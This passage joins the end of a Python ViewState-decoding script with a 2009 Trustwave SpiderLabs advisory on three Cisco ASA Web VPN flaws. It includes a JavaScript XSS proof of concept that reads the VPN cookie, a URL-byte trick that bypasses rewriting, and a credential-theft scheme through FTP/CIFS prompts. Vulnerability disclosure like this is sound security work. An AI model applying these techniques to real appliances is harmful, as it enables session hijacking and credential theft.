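    approximation: ASP.Net keys the real MAC with the machineKey validationKey
    and page-specific modifiers, so this blob would not validate on a server."""
    data = base64.b64decode(b64)
    return base64.b64encode(data + hmac.new(key, data, hashlib.sha1).digest()).decode()


if __name__ == "__main__":
    tree, trailing = decode_viewstate(ADVISORY_VIEWSTATE)
    print("trailing bytes:", trailing, "| signed:", looks_signed(ADVISORY_VIEWSTATE))
    for s in strings_in(tree):
        print("string:", s)
```

Running the script prints the three strings of the advisory's payload (the page hash "-834067820", "innerhtml" and the script tag) and reports zero trailing bytes, i.e. no MAC. The same decoder, pointed at a real application's __VIEWSTATE, is a quick way to confirm whether EnableViewStateMac is actually in effect before assuming the remediation above has been applied.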
Trustwave's SpiderLabs Security Advisory TWSL2009-002
Trustwave's SpiderLabs Security Advisory TWSL2009-002: Cisco ASA Web VPN Multiple Vulnerabilities

Published: 2009-06-24
Version: 1.0

Vendor: Cisco Systems, Inc. (http://www.cisco.com)
Versions affected: 8.0(4), 8.1.2, and 8.2.1

Description:
Cisco's Adaptive Security Appliance (ASA) provides a number of security related features, including Web VPN functionality that allows authenticated users to access a variety of content through a web interface. This includes other web content, FTP servers, and CIFS file servers. The web content is proxied by the ASA and rewritten so that any URLs in the web content are passed as query parameters sent to the ASA web interface. Where scripting content is present, the ASA places a JavaScript wrapper around the original webpage's Document Object Model (DOM), to prevent the webpage from accessing the ASA's DOM.

Credit: David Byrne of Trustwave's SpiderLabs

Finding 1: Post-Authentication Cross-Site Scripting
CVE: CVE-2009-1201

The ASA's DOM wrapper can be rewritten in a manner that allows Cross-Site Scripting (XSS) attacks. For example, the csco_wrap_js JavaScript function in /+CSCOL+/cte.js makes a call to a function referenced by CSCO_WebVPN['process']. The result of this call is then used in an eval statement:

    function csco_wrap_js(str) {
      var ret = '<script id="CSCO_GHOST" src="' + CSCO_Gateway + '/+CSCOL+/cte.js"></scr' +
                'ipt><script id="CSCO_GHOST" src="' + CSCO_Gateway + '/+CSCOE+/apcf"></sc' + 'ript>';
      var js_mangled = CSCO_WebVPN['process']('js', str);
      ret += CSCO_WebVPN['process']('html', eval(js_mangled));
      return ret;
    };

To exploit this behavior, a malicious page can replace CSCO_WebVPN['process'] with an attacker-defined function that returns an arbitrary value. The next time csco_wrap_js is called, that value is passed to eval and the malicious code executes in the ASA's DOM. Below is a proof of concept.
    <html><script>
    function a(b, c) {
      return alert('Your VPN location:\n\n' + document.location +
                   '\n\n\n\n\nYour VPN cookie:\n\n' + document.cookie);
    }
    CSCO_WebVPN['process'] = a;
    csco_wrap_js('');
    </script></html>

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34 and 8.1.2.25. Updated Cisco ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
A vendor response will be posted at http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID: CSCsy80694.
CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Finding 2: HTML Rewriting Bypass
CVE: CVE-2009-1202

When a webpage is requested through the ASA's Web VPN, the target scheme and hostname are ROT13-encoded, then hex-encoded, and placed in the ASA's URL. For example, http://www.trustwave.com is accessed by requesting the following ASA path:

    /+CSCO+0075676763663A2F2F6A6A6A2E67656866676A6E69722E70627A++/

The HTML content returned for this request is reformatted by the ASA, starting at the very beginning of the document:

    <script id='CSCO_GHOST' src="/+webvpn+/toolbar.js">

However, if the request URL is modified to change the initial hex value of 00 to 01, the HTML document is returned without any rewriting. This allows the page's scriptable content to run in the ASA's DOM, making Cross-Site Scripting trivial.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34 and 8.1.2.25. Updated Cisco ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
A vendor response will be posted at http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID: CSCsy80705.
CVSS Score: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:H/RL:U/RC:C Base: 4.3 Temporal: 3.9

Finding 3: Authentication Credential Theft
CVE: CVE-2009-1203

When a user accesses an FTP or CIFS destination using the Web VPN, the resulting URL is formatted in a similar manner to the web requests described above.
The following URL attempts to connect to ftp.example.com; normally, it would be loaded in an HTML frame within the Web VPN website.

    /+CSCOE+/files/browse.html?code=init&path=ftp%3A%2F%2F7367632e726b6e7a6379722e70627a

The ASA first attempts to connect to the FTP server or CIFS share using anonymous credentials. If those fail, the user is prompted for login credentials. When viewed on its own (outside of a frame), the submission form gives no indication of what it is for and is very similar in appearance to the Web VPN's primary login page. If the URL were sent to a user by an attacker, it is very possible that the user would assume they need to resubmit their credentials to the Web VPN. The ASA would then forward the credentials to the attacker's FTP or CIFS server.

Vendor Response:
This vulnerability has been corrected in versions 8.0.4.34 and 8.1.2.25. Updated Cisco ASA software can be downloaded from: http://www.cisco.com/pcgi-bin/tablebuild.pl/ASAPSIRT
A vendor response will be posted at http://www.cisco.com/security
This vulnerability is documented in Cisco Bug ID: CSCsy80709.
CVSS Score: